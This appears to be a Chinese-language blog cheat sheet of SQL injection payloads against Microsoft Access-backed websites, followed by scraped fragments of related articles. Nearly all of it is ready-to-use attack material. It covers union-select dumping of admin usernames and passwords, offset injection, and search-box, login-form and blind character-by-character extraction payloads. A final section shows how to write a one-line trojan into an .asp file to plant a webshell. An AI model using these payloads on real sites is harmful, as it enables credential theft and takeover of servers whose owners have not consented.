access注入大全

access注入 access偏移注入 access搜索型注入 access登陆框注入

1.判断注入.

and 1=1
and 1=2
或者
-0
-1 看页面的变化

2. access注入.

联合查询
order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin

3. access偏移注入. 条件须有id字段

order by 13
and 1=2 union select 1,2,3,4,5,6,7,8,9,* from admin 直到*正常

13-9=4 4*2=8 13-8=5
and 1=2 union select 1,2,3,4,5,* from (admin as a inner join admin as b on a.id=b.id)

4. access爆字段

select * from next where id=1 ORDER BY sum(1)
只能爆出一个字段 如为 bm_username 就可以猜其他的了

还可以通过网站后台 查看源代码查找字段

5 .access搜索型注入

2010%‘and(select count(*)from mssysaccessobjects)>0 and ‘%‘=‘ //返回正常。access数据库
2010%‘and(select count(*)from admin)>0 and ‘%‘=‘ //返回正常存 在admin表
2010%‘and(select count(username)from admin)>0 and ‘%‘=‘ //返回正常,存在username字段
2010%‘and(select count(password)from admin)>0 and ‘%‘=‘ //返回正常,并且存在password字段
2010%‘and(select top 1 len(username)from admin)>4 and ‘%‘=‘ //返回正常username长度大于4
2010%‘and(select top 1 len(username)from admin)=5 and ‘%‘=‘ //返回正常username长度等于5
2010%‘and(select top 1 len(password)from admin)=32 and ‘%‘=‘ //返回正常,密码长度为32位加密。

username length 5
password length 32

2010%‘and(select top 1 asc(mid(username,1,1))from admin)=97 and ‘%‘=‘ //a
以下都是对应位置的ascii的编码,如果不是则返回错误。
2010%‘and(select top 1 asc(mid(password,1,1))from admin)=48 and ‘%‘=‘,
2010%‘and(select top 1 asc(mid(password,2,1))from admin)=102 and ‘%‘=‘
2010%‘and(select top 1 asc(mid(password,3,1))from admin)=101 and ‘%‘=‘
2010%‘and(select top 1 asc(mid(password,4,1))from admin)=102 and ‘%‘=‘

这个查询太费时间了 可以试下union联合查询
2010%‘ order by 10 and ‘%‘=‘
2010%‘ and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin and ‘%‘=‘
2010%‘and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin and ‘%‘=‘

6. access登陆框注入

1. a‘ or(select count(*) from admin)>0 and ‘1‘=‘1
2. a‘ or(select count(username) from admin)>0 and ‘1‘=‘1
3. a‘ or(select count(password) from admin)>0 and ‘1‘=‘1

这个查询太费时间了 可以试下union联合查询

a‘ union select 1,2,3,4,5,6,7,8,9,10 from admin and ‘1‘=‘1
a‘ union select 1,username,3,4,password,6,7,8,9,10 from admin and ‘1‘=‘1

7.ACCESS执行SQL语句导出一句话拿webshell

第一句代码
1.create table cmd (a varchar(50))
第二句代码
1.insert into cmd (a) values (‘一句话木马‘)
第三句代码
1.select * into [a] in ‘e:\host\web2011\ok.asp;ok.xls‘ ‘excel 4.0;‘ from cmd
第四句代码
1.drop table cmd

时间: 2024-10-08 02:29:04

access注入大全的相关文章

access注入语句

先猜表:and exists (select *from 表名) and ''=' ' and exists(select * from admin) and ''=' 显示正常,说明有admin表.下面来猜字段 ' and exists(select 段名 from admin)and ''=' ' and exists(select name from admin) and ''='   存在字段name ' and exists(select pass from admin) and ''

access注入

前面有自己总结详细的mysql注入,自己access注入碰到的比较少,虽然比较简单,但是这里做一个总结 union联合查询法: 因为union前后字段数相同,所以可以先用order by 22 使查询结果按列序排序,确定当前有多少列,顺便直接爆出显示位 逐字猜解法: 查表:and exists (select * from 表名) 查列:and exists (select 列名 from 表名) //存在就返回正常页面,不存在就报错 查数据:1.确定此条数据字段(列名)长度 2.确定asc数据

1.sqlmap学习笔记之Access注入

使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] resuming back-end DBMS 'microsoft access' ------------------------- 2.猜数据库表,输入: .sqlmap.py -u "http:/

PHP注入大全,分低级篇,中级篇,高级篇

谨以此献给黑客x档案的新手们 前言:现在的网络,最流行的攻击手段有两种,一种是缓冲区溢出攻击,一种是SQL注入,相对而言,最流行的还是脚本注入,而脚本注入漏洞更是风靡黑客界.不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷! 正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI.教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入漏洞!可是,工具是死的,注入的手法却是活的,能否根据实际情况灵活地构造SQL注入语句,得到自己想要的信息,是

老调重弹-access注入过主机卫

本文作者:i春秋签约作家--非主流 大家好,我是来自农村的非主流,今天就给在座的各位表演个绝活. 首先打开服务器上安装了主机卫士的网站. 尝试在变量id的值后面插入万恶的单引号,根据报错,我们可以分析出来,网站使用的是access数据库. 通过order+by查看当前表有多少个列,发现6的时候报错,5的时候正常,表明当前表中有5个列 接着试试联合查询 Duang的一下,就被拦截了~~~(呜呜呜~~~),那只能操出万能的黑客神技:fuzz了! 只有一个union时,提示语法错误 Union+sel

WEB安全 ACCESS 注入、盲注脚本

http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //大写绕过http://www.xxx.cn/cp.asp?classid=3 AND 1=2http://www.xxx.cn/cp.asp?classid=3 ORDER BY 8%16 //正常http://www.xxx.cn/cp.asp?

渗透常用SQL注入语句大全

QL注入大全 Crack8小组 整理 1.判断有无注入点; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(sele

学习笔记五-sql之access和mssql注入

1,access数据库的介绍 关系数据库管理系统,微软的小型数据库 优势:提高速度,减少代码量,避免使用过程调用 缺陷:数据过大,性能下降,数据库刷写导致问题,安全不行 后缀名为*.mdb 打开工具:辅臣,破障 搭建平台:小旋风aspweb工具 2,access数据库调用分析 asp网站,(id=)参数传递,看到参数,看查询语句,使用破障分析数据 代码审计看是否有过滤 3,access注入原理 首先判断是否存在注入点 '    ,and 1=1,and 1=2, 如果前面的过滤掉了,用后面的判断

渗透学习笔记之access偏移注入

access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名 access注入语句: 1 Order by * 2 a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id) 这句话就是说把admin表记为a,同时也记为b,然后查询条件是a表的id列与b表的id列相等,返回所有相等的行,显然,a,b都是同一个表,当然全部返回啦.不理解的查一查语法吧. 3 *代